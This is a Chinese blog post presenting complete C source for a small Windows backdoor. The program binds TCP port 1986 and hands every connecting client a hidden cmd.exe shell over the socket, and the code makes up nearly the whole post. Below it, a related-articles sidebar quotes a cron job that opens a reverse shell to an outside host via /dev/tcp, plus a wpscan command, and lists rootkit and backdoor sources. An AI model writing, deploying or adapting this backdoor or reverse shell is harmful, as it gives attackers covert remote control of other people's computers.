Little Backdoor

最新推荐文章于 2025-09-06 19:07:12 发布
最新推荐文章于 2025-09-06 19:07:12 发布
阅读量511 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: linker winapi stream null socket windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/heiyoubei513/article/details/4009295
本文介绍了一个简单的后门程序实现过程,该程序通过创建监听线程接收远程指令并执行CMD命令,实现远程控制功能。使用了Winsock2及Windows API进行网络通信与进程管理。

 十分钟写了一个小后门,呵呵这只是一个雏形,功能很单一,见笑了!

 

#pragma comment(linker,"/subsystem:windows /FILEALIGN:0x200 /ENTRY:Entrypoint")
#pragma comment(linker,"/INCREMENTAL:NO /IGNORE:4078")
#pragma comment(linker,"/MERGE:.idata=.text /MERGE:.data=.text /MERGE:.rdata=.text /MERGE:.text=DNA32r /SECTION:DNA32r,EWR")
#pragma comment(lib,"ws2_32.lib")

#include <winsock2.h>
#include <windows.h>

#define MasterPort 1986 //连接端口

int WINAPI ShellThread(SOCKET SSocket)
{
 STARTUPINFO StartupInfo;
 PROCESS_INFORMATION ProcessInfo;
 char szCMDPath[255];

 //ZeroMemory(&wsaData,sizeof(WSADATA));
 ZeroMemory(&StartupInfo,sizeof(STARTUPINFO));
 ZeroMemory(&ProcessInfo,sizeof(PROCESS_INFORMATION));

 StartupInfo.cb = sizeof(STARTUPINFO);
 StartupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
 StartupInfo.wShowWindow = SW_HIDE;
 StartupInfo.hStdInput = (HANDLE)SSocket;
 StartupInfo.hStdOutput = (HANDLE)SSocket;
 StartupInfo.hStdError = (HANDLE)SSocket;
 //获取CMD的路径
 GetEnvironmentVariable("ComSpec",szCMDPath,sizeof(szCMDPath));
 //创建匿名管道
 ::CreateProcess(NULL,szCMDPath,0,0,1,0,0,0,&StartupInfo,&ProcessInfo);
 ::WaitForSingleObject(ProcessInfo.hProcess,INFINITE);
 ::CloseHandle(ProcessInfo.hProcess);
 ::CloseHandle(ProcessInfo.hThread);
 return 0;
}

void Entrypoint()
{
 WSADATA wsaData;
 sockaddr_in SockAddrIn;
 SOCKET CSocket,SSocket;
 int iAddrSize;

 ZeroMemory(&wsaData,sizeof(WSADATA)); 
 //加载ws2_32.dll
 WSAStartup(0x0202,&wsaData);

 //设置本地信息和绑定协议
 SockAddrIn.sin_family = AF_INET;
 SockAddrIn.sin_port = htons(MasterPort);
 SockAddrIn.sin_addr.S_un.S_addr = INADDR_ANY;
 CSocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
 
 //绑定端口
 bind(CSocket,(sockaddr *)&SockAddrIn,sizeof(SockAddrIn));
 listen(CSocket,1);
 
 while(TRUE)
 {
  iAddrSize = sizeof(SockAddrIn);
  SSocket = accept(CSocket,(sockaddr *)&SockAddrIn,&iAddrSize);
  CreateThread(0,0,(LPTHREAD_START_ROUTINE)ShellThread,(LPVOID)SSocket,0,0);
 }

 ::closesocket(CSocket);
 ::closesocket(SSocket);
 ::WSACleanup();
 //return 0;
}

heiyoubei513
关注
UVM——RAL模型运用之四(使用ralgen生成regmodel方法、部分枚举变量“_e“含义)
Mr.翟的博客
05-05 9363
文章目录一、生成RAL model命令 一、生成RAL model命令   生成RAL model命令: ralgen [options] -t topname -I dir -uvm {filename.ralf}。ralgen是vcs工具的命令,输入对象是*.ralf文件,生成*.sv文件,即RAL mode就是橘红色框图。ralf文件可以通过excel表格生成。 -uvm...
著名后门nameless源代码NameLess BackDoor V1.14(稳定版)
09-14
著名后门nameless的源代码 可以自己修改 虽然有点老 但是思路还是很值得借鉴的
Backdoor.Zegost木马病毒分析(一)
Fly20141201. 的专栏
12-27 5515
http://blog.csdn.net/qq1084283172/article/details/50413426 一、样本信息 样本名称:rt55.exe 样本大小: 159288 字节 文件类型:EXE文件 病毒名称:Win32. Backdoor.Zegost 样本MD5:C176AF21AECB30C2DF3B8B8D8AA27510 样本SHA1:16E95
backdoor
李浩荣的专栏
09-01 1033
#include void main(){ system("my-pass");} 查看 /etc/services 相关backdoor的端口在   cmd下 telnet 211.111.23.224 端口获得口令 
Backdoor
weixin_45007073的博客
01-04 2966
Backdoor信息收集漏洞利用第一种方法第二种方法提权 信息收集 发现目标主机开放了ssh和web服务 我们将backdoor.htb添加到hosts文件中后,访问web服务,发现是一个WordPress页面,并且版本是5.8.1 既然是wordpress,那么我们可以直接使用wpscan来扫描存在哪些漏洞 wpscan --url http://backdoor.htb/ --api-token X4CFiaLdgwD6FwDMhkrZMpNjFDZ7Ex6DWqlcPM9DVic --enumer
改变程序入口函数#pragma comment(linker, "/ENTRY:main")
比尔丁子
12-20 3004
#include #pragma comment(linker, "/ENTRY:foo ")   int main() {      return 0; }   int foo() {      std::cout      return 0; }
[UVM]在SoC中用寄存器模型backdoor访问寄存器的案例
元直的博客
05-03 812
摘要:本文介绍了UVM验证环境中寄存器模型的BACKDOOR访问机制及其应用。BACKDOOR访问通过直接操作DUT内部信号实现寄存器读写,相比FRONTDOOR访问更高效,适用于调试和层次化验证场景。文章详细阐述了BACKDOOR路径的定义方法(add_hdl_path/add_hdl_path_slice)、在层次化环境(IP/Sub-system/SoC)中的实现策略,以及寄存器模型复用时的注意事项。通过代码示例展示了如何从SoC顶层直接访问嵌套IP寄存器,并讨论了路径一致性维护和动态更新方法。
[UVM]UVM Register Model之Backdoor Access模型构建
元直的博客
04-22 1183
本文介绍了UVM Register Model中Backdoor Access的构建方法。首先通过RALF文件定义寄存器结构,包括地址、位域和访问属性等。然后详细说明了如何通过继承uvm_reg_backdoor类来实现后门访问,包括常规寄存器和数组寄存器的读/写方法实现。对于层次化设计,文章展示了如何通过uvm_hdl_read/deposit接口实现跨模块访问,并说明了如何在reg_block中配置后门路径。这种后门访问方式可以绕过总线协议,直接访问硬件信号,在验证中提高效率。
Backdoor and Linux LKM Rootkit
weixin_30342209的博客
07-21 358
Backdoor and Linux LKM Rootkit(中文) http://www.3our.com 未知 2004-8-9 Backdoor and Linux LKM Rootkit(中文) 翻译:e4gle(大鹰) Backdoor an...
[UVM]UVM Register Model(RAL Model)的构建
元直的博客
03-17 1904
RAL Model在SoC验证中是非常重要的,通过RAL Model进行寄存器的读写,大大降低的TB对RTL改动的依赖。那么我们应该怎么建立RAL Model呢?本文将总结一种方案。
UVM--对寄存器建模的方法 RAL
liuxiaogang_的博客
11-26 2401
说明 验证需要包含对寄存器和存储器的验证,寄存器用来描述芯片配置信息和状态信息 自己实现 可通过启动读写寄存器的sequence来完成 sequence产生的寄存器事务传递给driver,driver来写入寄存器的值或者读取寄存器的值,monitor再从接口上获取信息,判断是哪个寄存器和它的值,这是一种简单的检测寄存器的方法,但是在其他组件中难以启动或者查看某些寄存器的值,在某种情况下 scoreboard想查看寄存器中某个的状态,则不知道什么时候去触发这个,只能通过事务状态来启动sequence
uvm后门访问regmodel的例子
05-29
reg_map = create_map("my_reg_map", 0, UVM_LITTLE_ENDIAN); my_reg_inst.configure(reg_map, 0, "my_reg"); my_reg_inst.build(); endfunction endclass class my_reg extends uvm_reg; `uvm_object_utils...
Linux_backdoor
dengzhasong7076的博客
05-13 829
Linux权限维持 前言 并未深入研究backdoor是怎么写的,只是研究一下网上存在的几种后门的用法。 测试环境:centos 6.5 crontab 计划任务,永远的爱 每60分钟反弹一次shell给dns.wuyun.org的53端口 (crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;...
后门构建工具Backdoor Factory
weixin_33896069的博客
05-17 394
2019独角兽企业重金招聘Python工程师标准>>> ...
C++和OpenGL实现3D游戏编程【连载30】——文字的多行显示
最新发布
zhooyu的博客
09-06 24
OpenGL本身不直接支持文字渲染,需要通过外部库或自定义方法实现。常见方法包括使用位图字体、FreeType库或显示列表(Display Lists)。本节我们着重进行显示列表的方法去实现文字的输入,并实现文字的多行显示、自动换行处理,根据字体样式、大小动态改变多行显示效果,并实现多个文字字符串的拼接显示,以应变游戏中对文字处理的简单需要,在后续文章中再扩展其他两种文字显示方法。
DDD+WebAPI实战
赵玉的专栏
09-05 116
摘要:本文介绍了如何在ASP.NET Core WebAPI中实现领域驱动设计(DDD)。主要内容包括:1)DDD核心概念解析(领域、实体、聚合等);2)具体实现步骤:创建项目结构、定义领域模型、设计聚合根、实现仓储模式;3)通过订单系统示例展示代码结构;4)配置依赖注入和API测试方法。文章还提到可配置CI/CD流程实现持续部署。通过DDD可以构建结构清晰、易于维护的.NET业务应用。
【数据结构】带哨兵位双向循环链表
2301_79989168的博客
09-06 630
本文详细介绍了带头双向循环链表的实现。主要包含三个部分:1)链表分类,重点讲解了无头单向非循环链表和带头双向循环链表的特点及用途;2)双向循环链表的定义,包括结点结构定义和接口函数声明;3)接口函数的具体实现,包括初始化、插入/删除、查找等操作,特别强调了DListInsert和DListErase这两个核心接口的实现及其复用价值。通过代码示例展示了如何利用双向链表的结构优势简化操作,如头插/头删、尾插/尾删等。完整代码实现了带头双向循环链表的所有基本功能。
Lambda表达式
LXdian_LX的博客
09-05 798
通俗理解:Lambda表达式是一种匿名函数(未命名的函数对象),你可以在需要函数的地方就地定义它,而无需单独写一个命名函数或函数对象。它让代码更简洁、更灵活,尤其适用于短小的、一次性使用的函数逻辑,比如作为参数传递给算法(如std::sort核心思想:就地定义,即时使用。特性语法说明捕获列表[x, &y]定义如何访问外部变量参数列表和普通函数一样可变规范mutable允许修改值捕获的变量副本返回类型-> double可省略(编译器推断),复杂时需显式指定函数体{ ... }包含要执行的代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值